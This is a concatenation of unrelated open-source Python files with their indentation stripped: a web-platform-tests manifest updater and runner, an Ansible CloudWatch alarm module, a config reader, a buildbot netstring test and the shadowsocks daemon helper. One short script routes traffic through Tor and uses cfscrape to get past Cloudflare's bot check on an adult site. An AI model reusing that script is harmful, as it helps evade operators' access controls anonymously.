not evaluated upfront but stored as python functions to be evaluated
at runtime.
When a result for a test is to be updated set_result on the
[Sub]TestNode is called to store the new result, alongside the
existing conditional that result's run info matched, if any. Once all
new results are known, coalesce_expected is called to compute the new
set of results and conditionals. The AST of the underlying parsed manifest
is updated with the changes, and the result is serialised to a file.
"""
Result = namedtuple("Result", ["run_info", "status"])
def data_cls_getter(output_node, visited_node):
# visited_node is intentionally unused
if output_node is None:
return ExpectedManifest
elif isinstance(output_node, ExpectedManifest):
return TestNode
elif isinstance(output_node, TestNode):
return SubtestNode
else:
raise ValueError
class ExpectedManifest(ManifestItem):
def __init__(self, node, test_path=None, url_base=None, property_order=None,
boolean_properties=None):
"""Object representing all the tests in a particular manifest
:param node: AST Node associated with this object. If this is None,
a new AST is created to associate with this manifest.
:param test_path: Path of the test file associated with this manifest.
:param url_base: Base url for serving the tests in this manifest.
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
if node is None:
node = DataNode(None)
ManifestItem.__init__(self, node)
self.child_map = {}
self.test_path = test_path
self.url_base = url_base
assert self.url_base is not None
self.modified = False
self.boolean_properties = boolean_properties
self.property_order = property_order
def append(self, child):
ManifestItem.append(self, child)
if child.id in self.child_map:
print "Warning: Duplicate heading %s" % child.id
self.child_map[child.id] = child
def _remove_child(self, child):
del self.child_map[child.id]
ManifestItem._remove_child(self, child)
def get_test(self, test_id):
"""Return a TestNode by test id, or None if no test matches
:param test_id: The id of the test to look up"""
return self.child_map[test_id]
def has_test(self, test_id):
"""Boolean indicating whether the current test has a known child test
with id test id
:param test_id: The id of the test to look up"""
return test_id in self.child_map
@property
def url(self):
return urlparse.urljoin(self.url_base,
"/".join(self.test_path.split(os.path.sep)))
class TestNode(ManifestItem):
def __init__(self, node):
"""Tree node associated with a particular test in a manifest
:param node: AST node associated with the test"""
ManifestItem.__init__(self, node)
self.updated_expected = []
self.new_expected = []
self.subtests = {}
self.default_status = None
self._from_file = True
@classmethod
def create(cls, test_type, test_id):
"""Create a TestNode corresponding to a given test
:param test_type: The type of the test
:param test_id: The id of the test"""
url = test_id
name = url.split("/")[-1]
node = DataNode(name)
self = cls(node)
self.set("type", test_type)
self._from_file = False
return self
@property
def is_empty(self):
required_keys = set(["type"])
if set(self._data.keys()) != required_keys:
return False
return all(child.is_empty for child in self.children)
@property
def test_type(self):
"""The type of the test represented by this TestNode"""
return self.get("type", None)
@property
def id(self):
"""The id of the test represented by this TestNode"""
return urlparse.urljoin(self.parent.url, self.name)
def disabled(self, run_info):
"""Boolean indicating whether this test is disabled when run in an
environment with the given run_info
:param run_info: Dictionary of run_info parameters"""
return self.get("disabled", run_info) is not None
def set_result(self, run_info, result):
"""Set the result of the test in a particular run
:param run_info: Dictionary of run_info parameters corresponding
to this run
:param result: Status of the test in this run"""
if self.default_status is not None:
assert self.default_status == result.default_expected
else:
self.default_status = result.default_expected
# Add this result to the list of results satisfying
# any condition in the list of updated results it matches
for (cond, values) in self.updated_expected:
if cond(run_info):
values.append(Result(run_info, result.status))
if result.status != cond.value:
self.root.modified = True
break
else:
# We didn't find a previous value for this
self.new_expected.append(Result(run_info, result.status))
self.root.modified = True
def coalesce_expected(self):
"""Update the underlying manifest AST for this test based on all the
added results.
This will update existing conditionals if they got the same result in
all matching runs in the updated results, will delete existing conditionals
that get more than one different result in the updated run, and add new
conditionals for anything that doesn't match an existing conditional.
Conditionals not matched by any added result are not changed."""
final_conditionals = []
try:
unconditional_status = self.get("expected")
except KeyError:
unconditional_status = self.default_status
for conditional_value, results in self.updated_expected:
if not results:
# The conditional didn't match anything in these runs so leave it alone
final_conditionals.append(conditional_value)
elif all(results[0].status == result.status for result in results):
# All the new values for this conditional matched, so update the node
result = results[0]
if (result.status == unconditional_status and
conditional_value.condition_node is not None):
self.remove_value("expected", conditional_value)
else:
conditional_value.value = result.status
final_conditionals.append(conditional_value)
elif conditional_value.condition_node is not None:
# Blow away the existing condition and rebuild from scratch
# This isn't sure to work if we have a conditional later that matches
# these values too, but we can hope, verify that we get the results
# we expect, and if not let a human sort it out
self.remove_value("expected", conditional_value)
self.new_expected.extend(results)
elif conditional_value.condition_node is None:
self.new_expected.extend(result for result in results
if result.status != unconditional_status)
# It is an invariant that nothing in new_expected matches an existing
# condition except for the default condition
if self.new_expected:
if all(self.new_expected[0].status == result.status
for result in self.new_expected) and not self.updated_expected:
status = self.new_expected[0].status
if status != self.default_status:
self.set("expected", status, condition=None)
final_conditionals.append(self._data["expected"][-1])
else:
for conditional_node, status in group_conditionals(
self.new_expected,
property_order=self.root.property_order,
boolean_properties=self.root.boolean_properties):
if status != unconditional_status:
self.set("expected", status, condition=conditional_node.children[0])
final_conditionals.append(self._data["expected"][-1])
if ("expected" in self._data and
len(self._data["expected"]) > 0 and
self._data["expected"][-1].condition_node is None and
self._data["expected"][-1].value == self.default_status):
self.remove_value("expected", self._data["expected"][-1])
if ("expected" in self._data and
len(self._data["expected"]) == 0):
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == "expected"):
child.remove()
break
def _add_key_value(self, node, values):
ManifestItem._add_key_value(self, node, values)
if node.data == "expected":
self.updated_expected = []
for value in values:
self.updated_expected.append((value, []))
def clear_expected(self):
"""Clear all the expected data for this test and all of its subtests"""
self.updated_expected = []
if "expected" in self._data:
for child in self.node.children:
if (isinstance(child, KeyValueNode) and
child.data == "expected"):
child.remove()
del self._data["expected"]
break
for subtest in self.subtests.itervalues():
subtest.clear_expected()
def append(self, node):
child = ManifestItem.append(self, node)
self.subtests[child.name] = child
def get_subtest(self, name):
"""Return a SubtestNode corresponding to a particular subtest of
the current test, creating a new one if no subtest with that name
already exists.
:param name: Name of the subtest"""
if name in self.subtests:
return self.subtests[name]
else:
subtest = SubtestNode.create(name)
self.append(subtest)
return subtest
class SubtestNode(TestNode):
def __init__(self, node):
assert isinstance(node, DataNode)
TestNode.__init__(self, node)
@classmethod
def create(cls, name):
node = DataNode(name)
self = cls(node)
return self
@property
def is_empty(self):
if self._data:
return False
return True
def group_conditionals(values, property_order=None, boolean_properties=None):
"""Given a list of Result objects, return a list of
(conditional_node, status) pairs representing the conditional
expressions that are required to match each status
:param values: List of Results
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
by_property = defaultdict(set)
for run_info, status in values:
for prop_name, prop_value in run_info.iteritems():
by_property[(prop_name, prop_value)].add(status)
if property_order is None:
property_order = ["debug", "os", "version", "processor", "bits"]
if boolean_properties is None:
boolean_properties = set(["debug"])
else:
boolean_properties = set(boolean_properties)
# If we have more than one value, remove any properties that are common
# for all the values
if len(values) > 1:
for key, statuses in by_property.copy().iteritems():
if len(statuses) == len(values):
del by_property[key]
properties = set(item[0] for item in by_property.iterkeys())
include_props = []
for prop in property_order:
if prop in properties:
include_props.append(prop)
conditions = {}
for run_info, status in values:
prop_set = tuple((prop, run_info[prop]) for prop in include_props)
if prop_set in conditions:
continue
expr = make_expr(prop_set, status, boolean_properties=boolean_properties)
conditions[prop_set] = (expr, status)
return conditions.values()
def make_expr(prop_set, status, boolean_properties=None):
"""Create an AST that returns the value ``status`` given all the
properties in prop_set match.
:param prop_set: tuple of (property name, value) pairs for each
property in this expression and the value it must match
:param status: Status on RHS when all the given properties match
:param boolean_properties: Set of properties in property_order that should
be treated as boolean.
"""
root = ConditionalNode()
assert len(prop_set) > 0
expressions = []
for prop, value in prop_set:
number_types = (int, float, long)
value_cls = (NumberNode
if type(value) in number_types
else StringNode)
if prop not in boolean_properties:
expressions.append(
BinaryExpressionNode(
BinaryOperatorNode("=="),
VariableNode(prop),
value_cls(unicode(value))
))
else:
if value:
expressions.append(VariableNode(prop))
else:
expressions.append(
UnaryExpressionNode(
UnaryOperatorNode("not"),
VariableNode(prop)
))
if len(expressions) > 1:
prev = expressions[-1]
for curr in reversed(expressions[:-1]):
node = BinaryExpressionNode(
BinaryOperatorNode("and"),
curr,
prev)
prev = node
else:
node = expressions[0]
root.append(node)
root.append(StringNode(status))
return root
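# Illustrative only (not part of wptrunner): build the AST for a conditional
# roughly equivalent to `if os == "linux" and debug: FAIL`. Property names,
# values and the status are invented for the example.
def _example_make_expr():
    return make_expr((("os", "linux"), ("debug", True)), "FAIL",
                     boolean_properties=set(["debug"]))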
def get_manifest(metadata_root, test_path, url_base, property_order=None,
boolean_properties=None):
"""Get the ExpectedManifest for a particular test path, or None if there is no
metadata stored for that test path.
:param metadata_root: Absolute path to the root of the metadata directory
:param test_path: Path to the test(s) relative to the test root
:param url_base: Base url for serving the tests in this manifest
:param property_order: List of properties to use in expectation metadata
from most to least significant.
:param boolean_properties: Set of properties in property_order that should
be treated as boolean."""
manifest_path = expected.expected_path(metadata_root, test_path)
try:
with open(manifest_path) as f:
return compile(f, test_path, url_base, property_order=property_order,
boolean_properties=boolean_properties)
except IOError:
return None
def compile(manifest_file, test_path, url_base, property_order=None,
boolean_properties=None):
return conditional.compile(manifest_file,
data_cls_getter=data_cls_getter,
test_path=test_path,
url_base=url_base,
property_order=property_order,
boolean_properties=boolean_properties)
| mpl-2.0 |
LorneWu/e-Gental-downloader | note tor_try_cloudflare_fail.py | 1 | 1111 | import socks
import socket
from urllib.request import urlopen
import requests
import header_s
import time
from bs4 import BeautifulSoup
# Route all socket traffic through the local Tor SOCKS5 proxy.
socks.set_default_proxy(socks.SOCKS5, "localhost", 9050)
socket.socket = socks.socksocket
# Confirm that both requests and urllib now report the Tor exit node's IP.
print(requests.get('http://icanhazip.com').text)
print(urlopen('http://icanhazip.com').read())
url = 'https://e-hentai.org/?f_doujinshi=1&f_manga=1&f_artistcg=1&f_gamecg=1&f_western=1&f_non-h=1&f_imageset=1&f_cosplay=1&f_asianporn=1&f_misc=1&f_search=Miyuko&f_apply=Apply+Filter'
header_s.getprofile()
import cfscrape
while True:
try:
scraper = cfscrape.create_scraper() # returns a CloudflareScraper instance
# Or: scraper = cfscrape.CloudflareScraper() # CloudflareScraper inherits from requests.Session
# Fetch the page through the Cloudflare-aware scraper; the first call just
# prints the response object for debugging.
print(scraper.get(url, headers=header_s.file_1))
html = scraper.get(url, headers=header_s.file_1)  # previously: requests.get(url, headers=header_s.file_1)
#print(html.text)
except Exception as e:
print(e)
else:
sp = BeautifulSoup(html.text,'html.parser')
print(sp.select('title'))
time.sleep(10) | gpl-3.0 |
aperigault/ansible | lib/ansible/modules/cloud/amazon/ec2_metric_alarm.py | 11 | 12566 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = """
module: ec2_metric_alarm
short_description: "Create/update or delete AWS Cloudwatch 'metric alarms'"
description:
- Can create or delete AWS metric alarms.
- Metrics you wish to alarm on must already exist.
version_added: "1.6"
author: "Zacharie Eakin (@Zeekin)"
options:
state:
description:
- register or deregister the alarm
required: true
choices: ['present', 'absent']
name:
description:
- Unique name for the alarm
required: true
metric:
description:
- Name of the monitored metric (e.g. CPUUtilization)
- Metric must already exist
required: false
namespace:
description:
- Name of the appropriate namespace ('AWS/EC2', 'System/Linux', etc.), which determines the category it will appear under in cloudwatch
required: false
statistic:
description:
- Operation applied to the metric
- Works in conjunction with period and evaluation_periods to determine the comparison value
required: false
choices: ['SampleCount','Average','Sum','Minimum','Maximum']
comparison:
description:
- Determines how the threshold value is compared
required: false
choices: ['<=','<','>','>=']
threshold:
description:
- Sets the min/max bound for triggering the alarm
required: false
period:
description:
- The time (in seconds) between metric evaluations
required: false
evaluation_periods:
description:
- The number of times in which the metric is evaluated before final calculation
required: false
unit:
description:
- The threshold's unit of measurement
required: false
choices:
- 'Seconds'
- 'Microseconds'
- 'Milliseconds'
- 'Bytes'
- 'Kilobytes'
- 'Megabytes'
- 'Gigabytes'
- 'Terabytes'
- 'Bits'
- 'Kilobits'
- 'Megabits'
- 'Gigabits'
- 'Terabits'
- 'Percent'
- 'Count'
- 'Bytes/Second'
- 'Kilobytes/Second'
- 'Megabytes/Second'
- 'Gigabytes/Second'
- 'Terabytes/Second'
- 'Bits/Second'
- 'Kilobits/Second'
- 'Megabits/Second'
- 'Gigabits/Second'
- 'Terabits/Second'
- 'Count/Second'
- 'None'
description:
description:
- A longer description of the alarm
required: false
dimensions:
description:
- Describes to what the alarm is applied
required: false
alarm_actions:
description:
- A list of the names action(s) taken when the alarm is in the 'alarm' status, denoted as Amazon Resource Name(s)
required: false
insufficient_data_actions:
description:
- A list of the names of action(s) to take when the alarm is in the 'insufficient_data' status
required: false
ok_actions:
description:
- A list of the names of action(s) to take when the alarm is in the 'ok' status, denoted as Amazon Resource Name(s)
required: false
extends_documentation_fragment:
- aws
- ec2
"""
EXAMPLES = '''
- name: create alarm
ec2_metric_alarm:
state: present
region: ap-southeast-2
name: "cpu-low"
metric: "CPUUtilization"
namespace: "AWS/EC2"
statistic: Average
comparison: "<="
threshold: 5.0
period: 300
evaluation_periods: 3
unit: "Percent"
description: "This will alarm when a bamboo slave's cpu usage average is lower than 5% for 15 minutes "
dimensions: {'InstanceId':'i-XXX'}
alarm_actions: ["action1","action2"]
- name: Create an alarm to recover a failed instance
ec2_metric_alarm:
state: present
region: us-west-1
name: "recover-instance"
metric: "StatusCheckFailed_System"
namespace: "AWS/EC2"
statistic: "Minimum"
comparison: ">="
threshold: 1.0
period: 60
evaluation_periods: 2
unit: "Count"
description: "This will recover an instance when it fails"
dimensions: {"InstanceId":'i-XXX'}
alarm_actions: ["arn:aws:automate:us-west-1:ec2:recover"]
'''
try:
import boto.ec2.cloudwatch
from boto.ec2.cloudwatch import MetricAlarm
from boto.exception import BotoServerError, NoAuthHandlerFound
except ImportError:
pass # Taken care of by ec2.HAS_BOTO
import traceback
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (AnsibleAWSError, HAS_BOTO, connect_to_aws, ec2_argument_spec,
get_aws_connection_info)
def create_metric_alarm(connection, module):
name = module.params.get('name')
metric = module.params.get('metric')
namespace = module.params.get('namespace')
statistic = module.params.get('statistic')
comparison = module.params.get('comparison')
threshold = module.params.get('threshold')
period = module.params.get('period')
evaluation_periods = module.params.get('evaluation_periods')
unit = module.params.get('unit')
description = module.params.get('description')
dimensions = module.params.get('dimensions')
alarm_actions = module.params.get('alarm_actions')
insufficient_data_actions = module.params.get('insufficient_data_actions')
ok_actions = module.params.get('ok_actions')
alarms = None
try:
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to describe alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
if not alarms:
alm = MetricAlarm(
name=name,
metric=metric,
namespace=namespace,
statistic=statistic,
comparison=comparison,
threshold=threshold,
period=period,
evaluation_periods=evaluation_periods,
unit=unit,
description=description,
dimensions=dimensions,
alarm_actions=alarm_actions,
insufficient_data_actions=insufficient_data_actions,
ok_actions=ok_actions
)
try:
connection.create_alarm(alm)
changed = True
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to create alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
else:
alarm = alarms[0]
changed = False
for attr in ('comparison', 'metric', 'namespace', 'statistic', 'threshold', 'period', 'evaluation_periods', 'unit', 'description'):
if getattr(alarm, attr) != module.params.get(attr):
changed = True
setattr(alarm, attr, module.params.get(attr))
# This works around a current bug where the symbolic comparators ('<=', '<', '>', '>=') cannot be assigned directly when modifying an existing alarm.
comparison = alarm.comparison
comparisons = {'<=': 'LessThanOrEqualToThreshold', '<': 'LessThanThreshold', '>=': 'GreaterThanOrEqualToThreshold', '>': 'GreaterThanThreshold'}
alarm.comparison = comparisons[comparison]
dim1 = module.params.get('dimensions')
dim2 = alarm.dimensions
for keys in dim1:
if not isinstance(dim1[keys], list):
dim1[keys] = [dim1[keys]]
if keys not in dim2 or dim1[keys] != dim2[keys]:
changed = True
setattr(alarm, 'dimensions', dim1)
for attr in ('alarm_actions', 'insufficient_data_actions', 'ok_actions'):
action = module.params.get(attr) or []
# Boto and/or ansible may provide same elements in lists but in different order.
# Compare on sets since they do not need any order.
if set(getattr(alarm, attr)) != set(action):
changed = True
setattr(alarm, attr, module.params.get(attr))
try:
if changed:
connection.create_alarm(alarm)
except BotoServerError as e:
module.fail_json(msg=str(e))
result = alarms[0]
module.exit_json(changed=changed, name=result.name,
actions_enabled=result.actions_enabled,
alarm_actions=result.alarm_actions,
alarm_arn=result.alarm_arn,
comparison=result.comparison,
description=result.description,
dimensions=result.dimensions,
evaluation_periods=result.evaluation_periods,
insufficient_data_actions=result.insufficient_data_actions,
last_updated=result.last_updated,
metric=result.metric,
namespace=result.namespace,
ok_actions=result.ok_actions,
period=result.period,
state_reason=result.state_reason,
state_value=result.state_value,
statistic=result.statistic,
threshold=result.threshold,
unit=result.unit)
def delete_metric_alarm(connection, module):
name = module.params.get('name')
alarms = None
try:
alarms = connection.describe_alarms(alarm_names=[name])
except BotoServerError as e:
module.fail_json(msg="Failed to describe alarm %s: %s" % (name, str(e)), exception=traceback.format_exc())
if alarms:
try:
connection.delete_alarms([name])
module.exit_json(changed=True)
except BotoServerError as e:
module.fail_json(msg=str(e))
else:
module.exit_json(changed=False)
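# Illustrative playbook snippet (not part of the original module). This is a
# hedged sketch only: the module name, instance id, SNS topic ARN and the
# threshold values below are placeholders chosen for demonstration.
#
#   - ec2_metric_alarm:
#       state: present
#       name: "cpu-high"
#       metric: "CPUUtilization"
#       namespace: "AWS/EC2"
#       statistic: "Average"
#       comparison: ">="
#       threshold: 80.0
#       period: 300
#       evaluation_periods: 2
#       unit: "Percent"
#       dimensions: {InstanceId: "i-0123456789abcdef0"}
#       alarm_actions: ["arn:aws:sns:us-east-1:123456789012:example-topic"]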
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(required=True, type='str'),
metric=dict(type='str'),
namespace=dict(type='str'),
statistic=dict(type='str', choices=['SampleCount', 'Average', 'Sum', 'Minimum', 'Maximum']),
comparison=dict(type='str', choices=['<=', '<', '>', '>=']),
threshold=dict(type='float'),
period=dict(type='int'),
unit=dict(type='str', choices=['Seconds', 'Microseconds', 'Milliseconds', 'Bytes', 'Kilobytes', 'Megabytes', 'Gigabytes', 'Terabytes',
'Bits', 'Kilobits', 'Megabits', 'Gigabits', 'Terabits', 'Percent', 'Count', 'Bytes/Second', 'Kilobytes/Second',
'Megabytes/Second', 'Gigabytes/Second', 'Terabytes/Second', 'Bits/Second', 'Kilobits/Second', 'Megabits/Second',
'Gigabits/Second', 'Terabits/Second', 'Count/Second', 'None']),
evaluation_periods=dict(type='int'),
description=dict(type='str'),
dimensions=dict(type='dict', default={}),
alarm_actions=dict(type='list'),
insufficient_data_actions=dict(type='list'),
ok_actions=dict(type='list'),
state=dict(default='present', choices=['present', 'absent']),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
if region:
try:
connection = connect_to_aws(boto.ec2.cloudwatch, region, **aws_connect_params)
except (NoAuthHandlerFound, AnsibleAWSError) as e:
module.fail_json(msg=str(e))
else:
module.fail_json(msg="region must be specified")
if state == 'present':
create_metric_alarm(connection, module)
elif state == 'absent':
delete_metric_alarm(connection, module)
if __name__ == '__main__':
main()
| gpl-3.0 |
ulnic/weatherSensor | data/ConfigurationReader.py | 1 | 2775 | #!/usr/bin/python
"""
Configuration Handler
"""
import logging
# noinspection PyCompatibility
import ConfigParser
import data.Constants
logger = logging.getLogger(data.Constants.Constant.LOGGER_NAME)
class ConfigurationReader(object):
"""
Class handling the configuration parser from the configuration.ini file
"""
def __init__(self):
logger.info('Reading configurations from file')
self.parser = ConfigParser.SafeConfigParser()
self.parser.read(data.Constants.Constant.CONFIG_FILE_NAME)
def get_key_in_section(self, _section_name, _key_name):
"""
Retrieves the specific KEY from the SECTION in the configuration.ini file
:param _section_name: The CONFIG section to parse
:param _key_name: The KEY in the config section to read
:return: The value from the KEY inside the SECTION
"""
return self.parser.get(_section_name, _key_name)
def get_bool_key_in_section(self, _section_name, _key_name):
"""
        Retrieves and converts to BOOLEAN, the specific KEY from the SECTION in the configuration.ini file
        :param _section_name: The CONFIG section to parse
        :param _key_name: The KEY in the config section to read
        :return: The BOOLEAN value from the KEY inside the SECTION
"""
return self.parser.getboolean(_section_name, _key_name)
def get_int_key_in_section(self, _section_name, _key_name):
"""
        Retrieves and converts to INTEGER, the specific KEY from the SECTION in the configuration.ini file
        :param _section_name: The CONFIG section to parse
        :param _key_name: The KEY in the config section to read
        :return: The INTEGER value from the KEY inside the SECTION
"""
return self.parser.getint(_section_name, _key_name)
def get_all_section_names(self):
"""
Returns a list of config section names.
:return: List of all found sections in configuration.ini file.
"""
return [m for m in self.parser.sections()]
def has_sensor_section(self, _section_name):
"""
Queries the config file and return bool indicating if section found
:param _section_name: Section to search for
:return: BOOL indicating if the section was found
"""
return self.parser.has_section(_section_name)
def get_sensor_keys(self, _section_name):
"""
Retrieves all sensor keys under the section
:param _section_name: Section in config file to get keys from
:return: List of found key-values
"""
key_value_dict = {}
for name, value in self.parser.items(_section_name):
key_value_dict[name] = value
return key_value_dict
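# Illustrative usage sketch (not part of the original module). The helper below
# only exercises the public methods defined above; any section or key names it
# would be called with are assumptions, since the real ones live in the
# project's configuration.ini file.
def _example_dump_configuration():
    reader = ConfigurationReader()
    for section in reader.get_all_section_names():
        logger.debug('Config section %s: %s', section, reader.get_sensor_keys(section))
    return reader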
| mit |
rodrigc/buildbot | master/buildbot/test/unit/util/test_netstrings.py | 6 | 1708 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from twisted.protocols import basic
from twisted.trial import unittest
from buildbot.util import netstrings
class NetstringParser(unittest.TestCase):
def test_valid_netstrings(self):
p = netstrings.NetstringParser()
p.feed("5:hello,5:world,")
self.assertEqual(p.strings, [b'hello', b'world'])
def test_valid_netstrings_byte_by_byte(self):
# (this is really testing twisted's support, but oh well)
p = netstrings.NetstringParser()
[p.feed(c) for c in "5:hello,5:world,"]
self.assertEqual(p.strings, [b'hello', b'world'])
def test_invalid_netstring(self):
p = netstrings.NetstringParser()
with self.assertRaises(basic.NetstringParseError):
p.feed("5-hello!")
def test_incomplete_netstring(self):
p = netstrings.NetstringParser()
p.feed("11:hello world,6:foob")
# note that the incomplete 'foobar' does not appear here
self.assertEqual(p.strings, [b'hello world'])
| gpl-2.0 |
kigawas/shadowsocks | shadowsocks/daemon.py | 694 | 5602 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2014-2015 clowwindy
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function, \
with_statement
import os
import sys
import logging
import signal
import time
from shadowsocks import common, shell
# this module is ported from ShadowVPN daemon.c
def daemon_exec(config):
if 'daemon' in config:
if os.name != 'posix':
raise Exception('daemon mode is only supported on Unix')
command = config['daemon']
if not command:
command = 'start'
pid_file = config['pid-file']
log_file = config['log-file']
if command == 'start':
daemon_start(pid_file, log_file)
elif command == 'stop':
daemon_stop(pid_file)
# always exit after daemon_stop
sys.exit(0)
elif command == 'restart':
daemon_stop(pid_file)
daemon_start(pid_file, log_file)
else:
raise Exception('unsupported daemon command %s' % command)
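# Illustrative sketch (not part of the original project): the configuration keys
# that daemon_exec() consumes. The file paths below are placeholder values for
# demonstration only.
_EXAMPLE_DAEMON_CONFIG = {
    'daemon': 'start',                          # or 'stop' / 'restart'
    'pid-file': '/tmp/shadowsocks-example.pid',
    'log-file': '/tmp/shadowsocks-example.log',
}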
def write_pid_file(pid_file, pid):
import fcntl
import stat
try:
fd = os.open(pid_file, os.O_RDWR | os.O_CREAT,
stat.S_IRUSR | stat.S_IWUSR)
except OSError as e:
shell.print_exception(e)
return -1
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
assert flags != -1
flags |= fcntl.FD_CLOEXEC
r = fcntl.fcntl(fd, fcntl.F_SETFD, flags)
assert r != -1
# There is no platform independent way to implement fcntl(fd, F_SETLK, &fl)
# via fcntl.fcntl. So use lockf instead
try:
fcntl.lockf(fd, fcntl.LOCK_EX | fcntl.LOCK_NB, 0, 0, os.SEEK_SET)
except IOError:
r = os.read(fd, 32)
if r:
logging.error('already started at pid %s' % common.to_str(r))
else:
logging.error('already started')
os.close(fd)
return -1
os.ftruncate(fd, 0)
os.write(fd, common.to_bytes(str(pid)))
return 0
def freopen(f, mode, stream):
oldf = open(f, mode)
oldfd = oldf.fileno()
newfd = stream.fileno()
os.close(newfd)
os.dup2(oldfd, newfd)
def daemon_start(pid_file, log_file):
def handle_exit(signum, _):
if signum == signal.SIGTERM:
sys.exit(0)
sys.exit(1)
signal.signal(signal.SIGINT, handle_exit)
signal.signal(signal.SIGTERM, handle_exit)
# fork only once because we are sure parent will exit
pid = os.fork()
assert pid != -1
if pid > 0:
# parent waits for its child
time.sleep(5)
sys.exit(0)
# child signals its parent to exit
ppid = os.getppid()
pid = os.getpid()
if write_pid_file(pid_file, pid) != 0:
os.kill(ppid, signal.SIGINT)
sys.exit(1)
os.setsid()
signal.signal(signal.SIGHUP, signal.SIG_IGN)
print('started')
os.kill(ppid, signal.SIGTERM)
sys.stdin.close()
try:
freopen(log_file, 'a', sys.stdout)
freopen(log_file, 'a', sys.stderr)
except IOError as e:
shell.print_exception(e)
sys.exit(1)
def daemon_stop(pid_file):
import errno
try:
with open(pid_file) as f:
buf = f.read()
pid = common.to_str(buf)
if not buf:
logging.error('not running')
except IOError as e:
shell.print_exception(e)
if e.errno == errno.ENOENT:
# always exit 0 if we are sure daemon is not running
logging.error('not running')
return
sys.exit(1)
pid = int(pid)
if pid > 0:
try:
os.kill(pid, signal.SIGTERM)
except OSError as e:
if e.errno == errno.ESRCH:
logging.error('not running')
# always exit 0 if we are sure daemon is not running
return
shell.print_exception(e)
sys.exit(1)
else:
logging.error('pid is not positive: %d', pid)
# sleep for maximum 10s
for i in range(0, 200):
try:
# query for the pid
os.kill(pid, 0)
except OSError as e:
if e.errno == errno.ESRCH:
break
time.sleep(0.05)
else:
logging.error('timed out when stopping pid %d', pid)
sys.exit(1)
print('stopped')
os.unlink(pid_file)
def set_user(username):
if username is None:
return
import pwd
import grp
try:
pwrec = pwd.getpwnam(username)
except KeyError:
logging.error('user not found: %s' % username)
raise
user = pwrec[0]
uid = pwrec[2]
gid = pwrec[3]
cur_uid = os.getuid()
if uid == cur_uid:
return
if cur_uid != 0:
logging.error('can not set user as nonroot user')
# will raise later
# inspired by supervisor
if hasattr(os, 'setgroups'):
groups = [grprec[2] for grprec in grp.getgrall() if user in grprec[3]]
groups.insert(0, gid)
os.setgroups(groups)
os.setgid(gid)
os.setuid(uid)
| apache-2.0 |
simartin/servo | tests/wpt/web-platform-tests/tools/wptrunner/wptrunner/wptrunner.py | 1 | 18782 | from __future__ import print_function, unicode_literals
import json
import os
import sys
from six import iteritems, itervalues
import wptserve
from wptserve import sslutils
from . import environment as env
from . import instruments
from . import mpcontext
from . import products
from . import testloader
from . import wptcommandline
from . import wptlogging
from . import wpttest
from mozlog import capture, handlers
from .font import FontInstaller
from .testrunner import ManagerGroup
from .browsers.base import NullBrowser
here = os.path.dirname(__file__)
logger = None
"""Runner for web-platform-tests
The runner has several design goals:
* Tests should run with no modification from upstream.
* Tests should be regarded as "untrusted" so that errors, timeouts and even
crashes in the tests can be handled without failing the entire test run.
* For performance, tests can be run in multiple browsers in parallel.
The upstream repository has the facility for creating a test manifest in JSON
format. This manifest is used directly to determine which tests exist. Local
metadata files are used to store the expected test results.
"""
def setup_logging(*args, **kwargs):
global logger
logger = wptlogging.setup(*args, **kwargs)
return logger
def get_loader(test_paths, product, debug=None, run_info_extras=None, chunker_kwargs=None,
test_groups=None, **kwargs):
if run_info_extras is None:
run_info_extras = {}
run_info = wpttest.get_run_info(kwargs["run_info"], product,
browser_version=kwargs.get("browser_version"),
browser_channel=kwargs.get("browser_channel"),
verify=kwargs.get("verify"),
debug=debug,
extras=run_info_extras,
enable_webrender=kwargs.get("enable_webrender"))
test_manifests = testloader.ManifestLoader(test_paths, force_manifest_update=kwargs["manifest_update"],
manifest_download=kwargs["manifest_download"]).load()
manifest_filters = []
include = kwargs["include"]
if test_groups:
include = testloader.update_include_for_groups(test_groups, include)
if include or kwargs["exclude"] or kwargs["include_manifest"] or kwargs["default_exclude"]:
manifest_filters.append(testloader.TestFilter(include=include,
exclude=kwargs["exclude"],
manifest_path=kwargs["include_manifest"],
test_manifests=test_manifests,
explicit=kwargs["default_exclude"]))
ssl_enabled = sslutils.get_cls(kwargs["ssl_type"]).ssl_enabled
h2_enabled = wptserve.utils.http2_compatible()
test_loader = testloader.TestLoader(test_manifests,
kwargs["test_types"],
